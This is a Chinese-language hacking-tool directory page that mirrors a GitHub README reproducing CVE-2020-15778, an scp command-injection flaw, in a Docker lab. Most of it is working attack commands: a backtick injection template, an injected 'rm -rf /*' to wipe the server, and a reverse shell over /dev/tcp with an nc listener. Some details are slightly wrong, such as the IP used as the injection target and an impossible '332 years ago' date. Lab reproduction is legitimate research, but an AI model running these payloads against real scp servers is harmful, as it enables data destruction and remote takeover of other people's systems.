Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/yifanzhg/cve-2020-15778
容器安全漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

重现 CVE-2020-15778 SCP 命令注入漏洞,利用基于 Docker 的客户端-服务器设置来测试远程代码执行和反弹 Shell 有效载荷。

查看仓库
332年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-15778

简介

本仓库复现了 CVE-2020-15778。

步骤

  1. 构建 scp 服务器和客户端的 Docker 镜像
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. 在容器中启动 scp 服务器。
root@kitploit:~
docker run -d -P --name scp-server server-cve

通过以下命令获取 scp 服务器的内部 IP 地址:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. 在容器中运行客户端。
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. 在客户端中通过执行 scp 命令向 scp 服务器注入自己的 shell 命令。

在客户端终端中运行:

root@kitploit:~
scp nil.txt root@<scp 服务器的内部 IP>:'`你的命令`/tmp'

密码为 "PASSWORD"。

示例

以下是一些利用此漏洞的示例。

  1. 删除服务器上所有内容以使其崩溃。
root@kitploit:~
scp nil.txt root@<scp 服务器的内部 IP>:'`rm -rf /*`/tmp'
  1. 将 scp 服务器的 bash shell 反射到客户端(模拟 SSH)。

在客户端机器上监听一个端口。

root@kitploit:~
nc -lvvp 8080

使用 scp 强制服务器将交互式 bash shell 映射到客户端机器。

root@kitploit:~
scp nil.txt root@<scp 客户端的内部 IP>:'`bash -i >& /dev/tcp/<scp 客户端的内部 IP>/8080 0>& 1`/tmp'

客户端 IP 地址可通过以下命令获取:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
下载工具